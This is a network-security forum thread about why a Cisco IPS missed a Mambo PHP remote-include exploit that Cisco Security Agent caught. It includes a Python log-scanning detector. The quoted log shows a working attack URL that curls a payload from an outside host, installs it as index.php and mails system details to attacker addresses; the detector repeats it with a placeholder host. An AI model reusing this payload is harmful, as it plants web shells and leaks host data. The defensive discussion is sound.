Cisco Support Community
New Member

PHP exploit triggers Cisco Security Agent but NOT in Cisco IPS....why?

Does anyone know which signature this exploit should trigger with the Cisco IPS sensor? Not sure if there is one or if we have it turned off?

We see this exploit hit our Exchange Servers many times during the week.

The process 'C:\WINNT\System32\inetsrv\inetinfo.exe' (as user NT AUTHORITY\SYSTEM) received the data '/index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://220.194.57.112/~photo/cm?&cmd=cd%20cache;curl%20-O%20http://220.194.57.112/~photo/cm;mv%20cm%20index.php;rm%20-rf%20cm*;uname%20-a%20|%20mail%20-s%20uname_i2_66.224.194.188%20kkparole@yahoo.com;uname%20-a%20|%20mail%20-s%20uname_i2_66.224.194.188%20michaelroul@yahoo.com;echo|'.

5 REPLIES
Bronze

Re: PHP exploit triggers Cisco Security Agent but NOT in Cisco I

Remove the IPS config file from the router and copy the config after restarting it.

New Member

Re: PHP exploit triggers Cisco Security Agent but NOT in Cisco I

We have approx 40 sensors...we never see a correlation between a php exploit caught on CSA with the IPS.

Are you aware of a signature related to this exploit?

New Member

Re: PHP exploit triggers Cisco Security Agent but NOT in Cisco I

Could the php exploit be over 443? I do not believe CSA will tell you this. However, you could paste the url portion that CSA is reporting into a browser and send it to a web server over port 80 and see what the sensor does. What PHP exploit is this? Do you know if there is a Cisco sig out for this particular exploit?

M

New Member (Accepted Solution)

Re: PHP exploit triggers Cisco Security Agent but NOT in Cisco I

I think this might be the mambo exploit. See http://www.securityfocus.com/archive/1/archive/1/427196/100/0/threaded for info. I searched on MySDN for mambo and found sig 5163 "Mambo Site Server Administrative Password ByPass". Here is an excerpt from the description: "Administrative access is gained by sending a specific url using the index2.php script and the PHPSESSID variable." This looks similar to what you pasted in. Notice "index2.php". Your IPS may not have seen this if it was over 443.

Hope this helps

M
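As an added example (not code from this thread, from Cisco, or from the CSA/IPS products), here is a host-side check in Python over constructed web-server log lines: it decodes the request as the server saw it and flags the include-path override and injected commands that appear in the CSA event above, which is why a port-443 request still shows up here even though a network IPS cannot inspect it. The log format, client IPs and attacker host are constructed placeholders.

```python
import re
from urllib.parse import unquote_plus

# Config-path variables the Mambo/Joomla include exploit overrides with an attacker URL.
INCLUDE_PARAMS = {"mosConfig_absolute_path", "mosConfig_live_site"}
REMOTE_SCHEME = re.compile(r"^(https?|ftp)://", re.IGNORECASE)
SHELL_HINT = re.compile(r"\b(curl|wget|uname|mail|rm|mv|cd)\b")

# Constructed sample log (W3C-style fields: date time c-ip s-port method uri-stem uri-query).
SAMPLE_LOG = [
    "2006-03-14 10:01:02 198.51.100.7 80 GET /index.php option=com_content&id=5",
    "2006-03-14 10:01:09 198.51.100.9 443 GET /index2.php option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&GLOBALS=&mosConfig_absolute_path=http://203.0.113.5/~photo/cm?&cmd=cd%20cache;curl%20-O%20http://203.0.113.5/~photo/cm;uname%20-a",
    "2006-03-14 10:02:30 198.51.100.7 80 GET /index2.php option=com_content&mosConfig_absolute_path=/var/www/mambo",
]

def parse_query(query):
    """Split on '&' only; ';' must stay inside values because that is where the
    injected shell commands (cmd=cd cache;curl ...) live."""
    pairs = []
    for chunk in query.split("&"):
        name, _, value = chunk.partition("=")
        pairs.append((unquote_plus(name), unquote_plus(value)))
    return pairs

def analyze_request(stem, query):
    """Return findings for one request; an empty list means nothing matched."""
    findings = []
    for name, value in parse_query(query):
        if name in INCLUDE_PARAMS and REMOTE_SCHEME.match(value):
            findings.append(f"remote include: {name}={value}")
        if name == "cmd" and SHELL_HINT.search(value):
            findings.append("shell commands passed via cmd=")
    if findings and stem.endswith("index2.php"):
        findings.append("index2.php target, the same script sig 5163 keys on")
    return findings

def scan_log(lines):
    """Return one hit per suspicious line. The server log holds the decrypted
    request, so a hit on port 443 is reported just like one on port 80."""
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) < 7:
            continue
        port, stem, query = int(fields[3]), fields[5], fields[6]
        findings = analyze_request(stem, query)
        if findings:
            hits.append({"port": port, "stem": stem, "findings": findings})
    return hits
```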

New Member

Re: PHP exploit triggers Cisco Security Agent but NOT in Cisco I

Interesting...the global signature for 5163 is retired/disabled globally by Cisco. This signature was published August of 2001 but IMHO should be enabled and deny packet/deny flow should be set to block this activity.
